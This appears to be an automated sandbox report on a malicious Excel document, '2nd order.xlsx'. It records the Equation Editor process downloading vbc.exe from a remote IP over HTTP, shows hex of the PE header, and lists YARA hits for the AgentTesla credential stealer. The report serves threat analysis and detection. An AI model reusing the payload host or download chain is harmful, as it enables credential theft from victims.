                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
                      Category:dropped
                      Size (bytes):11303
                      Entropy (8bit):7.909402464702408
                      Encrypted:false
                      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
                      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
                      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
                      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
                      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
                      Malicious:false
                      Preview:.PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:CDFV2 Encrypted
                      Category:dropped
                      Size (bytes):187544
                      Entropy (8bit):7.957616445178175
                      Encrypted:false
                      SSDEEP:3072:aLj1mT9HabqWjeKDyScpPeX7hCMy/WvByapQDToSyQjFHK3A6/qsNA:k1mNabqWjrEpeL8xjTjyQ5HK37CsNA
                      MD5:2228AC7E47957E002D910CC94F89DE42
                      SHA1:B501E0C89273DAB89064714D02CDAC80F2B66081
                      SHA-256:C4CC3595A77129454C15A736113CB88234ACC97074F7305754187D9FC168F58A
                      SHA-512:83FB2B703CCDA2E21283078EC4ADE5D6A1F7F0B1E33CE8F73A902E5FFA2CB1E366827A0AA31BCF0AB2865314A00508ADCC40857D7AC0B9429C64068B5EF8E2A7
                      Malicious:false
                      Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):512
                      Entropy (8bit):0.0
                      Encrypted:false
                      SSDEEP:3::
                      MD5:BF619EAC0CDF3F68D496EA9344137E8B
                      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                      Malicious:false
                      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      File Type:data
                      Category:dropped
                      Size (bytes):165
                      Entropy (8bit):1.4377382811115937
                      Encrypted:false
                      SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                      MD5:797869BB881CFBCDAC2064F92B26E46F
                      SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                      SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                      SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                      Malicious:false
                      Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                      Category:dropped
                      Size (bytes):860672
                      Entropy (8bit):6.572883902569515
                      Encrypted:false
                      SSDEEP:12288:v56/UhZo9xs63fvQAfo8y5gypOqw//wEkbpyXrf5r+2SF:v56/U/oF3RjSRQspy7fdgF
                      MD5:345EBABC50767D04F3457FA7790A8777
                      SHA1:F822FA282003B1A3F9301156AA5639A6928B93FD
                      SHA-256:2CA98A5A8B6BDD9EAC1FDF5C05E42792883DEA0AE402A6148BC6F04204CC6B72
                      SHA-512:8894559509EBD53A56A4649C25CB2380DA6717C9171F7CB86B2DF138463A4CF6979F27A81DFBA6114621F169DBCA17EE6E4FF44B6C4C4BAFE2A74BAD4E402B31
                      Malicious:true
                      Antivirus:
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a.............................2... ...@....@.. ....................................@.................................P2..K....`...............................1............................................... ............... ..H............text........ ...................... ..`.sdata.......@......................@....rsrc........`......................@..@.reloc............... ..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:CDFV2 Encrypted
                      Entropy (8bit):7.957616445178175
                      TrID:
                      • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                      File name:2nd order.xlsx
                      File size:187544
                      MD5:2228ac7e47957e002d910cc94f89de42
                      SHA1:b501e0c89273dab89064714d02cdac80f2b66081
                      SHA256:c4cc3595a77129454c15a736113cb88234acc97074f7305754187d9fc168f58a
                      SHA512:83fb2b703ccda2e21283078ec4ade5d6a1f7f0b1e33ce8f73a902e5ffa2cb1e366827a0aa31bcf0ab2865314a00508adcc40857d7ac0b9429c64068b5ef8e2a7
                      SSDEEP:3072:aLj1mT9HabqWjeKDyScpPeX7hCMy/WvByapQDToSyQjFHK3A6/qsNA:k1mNabqWjrEpeL8xjTjyQ5HK37CsNA
                      File Content Preview:........................>......................................................................................................................................................................................................................................
                      Icon Hash:e4e2aa8aa4b4bcb4
                      TimestampSource PortDest PortSource IPDest IP
                      Jan 28, 2022 18:40:42.313853025 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.429991007 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.430282116 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.431437969 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.547663927 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.547729969 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.547763109 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.547792912 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.547976971 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.548033953 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.661505938 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661573887 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661606073 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661634922 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661679983 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661719084 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661755085 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661793947 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.661887884 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.661937952 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.662272930 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.774422884 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774465084 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774477959 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774491072 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774503946 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774517059 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774535894 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774553061 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774568081 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774583101 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774597883 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774615049 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774631023 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774646997 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774646997 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.774662018 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774679899 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.774682045 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.774698973 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.774720907 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.774754047 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.777311087 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.885999918 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886077881 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886107922 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886149883 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886189938 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886238098 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886243105 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886282921 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886285067 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886291027 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886296034 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886327028 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886342049 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886368036 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886384010 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886410952 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886425018 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886449099 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886462927 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886491060 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886507034 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886532068 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886547089 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886571884 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886586905 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886612892 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886626959 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886651993 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886666059 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886693954 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886703014 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886734009 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886749983 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886773109 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886795998 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886811972 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886832952 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886852980 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886868000 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886890888 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886908054 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886931896 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886949062 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.886971951 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.886986971 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.887015104 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.887022972 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.887073040 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.887092113 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.887144089 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.887149096 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.887192011 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.887207985 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.887250900 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.889648914 CET4916780192.168.2.22198.12.127.213
                      Jan 28, 2022 18:40:42.998769045 CET8049167198.12.127.213192.168.2.22
                      Jan 28, 2022 18:40:42.998811960 CET8049167198.12.127.213192.168.2.22
                      • 198.12.127.213
                      Session IDSource IPSource PortDestination IPDestination PortProcess
                      0192.168.2.2249167198.12.127.21380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      TimestampkBytes transferredDirectionData
                      Jan 28, 2022 18:40:42.431437969 CET0OUTGET /400/vbc.exe HTTP/1.1
                      Accept: */*
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                      Host: 198.12.127.213
                      Connection: Keep-Alive
                      Jan 28, 2022 18:40:42.547663927 CET1INHTTP/1.1 200 OK
                      Date: Fri, 28 Jan 2022 17:40:42 GMT
                      Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
                      Last-Modified: Fri, 28 Jan 2022 13:52:18 GMT
                      ETag: "d2200-5d6a4be475dda"
                      Accept-Ranges: bytes
                      Content-Length: 860672
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: application/x-msdownload
                      Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0c f5 f3 61 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 14 0d 00 00 0a 00 00 00 00 00 00 9e 32 0d 00 00 20 00 00 00 40 0d 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 0d 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 32 0d 00 4b 00 00 00 00 60 0d 00 c0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0d 00 0c 00 00 00 fb 31 0d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 12 0d 00 00 20 00 00 00 14 0d 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 e8 01 00 00 00 40 0d 00 00 02 00 00 00 18 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 05 00 00 00 60 0d 00 00 06 00 00 00 1a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 0d 00 00 02 00 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                      Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELa2 @@ @P2K`1 H.text `.sdata@@.rsrc`@@.reloc @B


                      Click to jump to process

                      Target ID:0
                      Start time:18:40:15
                      Start date:28/01/2022
                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                      Wow64 process (32bit):false
                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Imagebase:0x13f8e0000
                      File size:28253536 bytes
                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:2
                      Start time:18:40:38
                      Start date:28/01/2022
                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Wow64 process (32bit):true
                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Imagebase:0x400000
                      File size:543304 bytes
                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:4
                      Start time:18:40:42
                      Start date:28/01/2022
                      Path:C:\Users\Public\vbc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\Public\vbc.exe"
                      Imagebase:0x8c0000
                      File size:860672 bytes
                      MD5 hash:345EBABC50767D04F3457FA7790A8777
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.475542322.0000000002491000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.475600602.0000000002520000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000004.00000002.475822749.0000000003499000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Antivirus matches:
                      • Detection: 100%, Joe Sandbox ML
                      Reputation:low

                      Target ID:5
                      Start time:18:40:46
                      Start date:28/01/2022
                      Path:C:\Users\Public\vbc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Users\Public\vbc.exe
                      Imagebase:0x8c0000
                      File size:860672 bytes
                      MD5 hash:345EBABC50767D04F3457FA7790A8777
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:.Net C# or VB.NET
                      Yara matches:
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.468099336.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.471469484.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: 00000005.00000002.669188276.0000000002281000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.471126039.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000000.469116733.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.668828373.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.669256478.0000000002324000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      No disassembly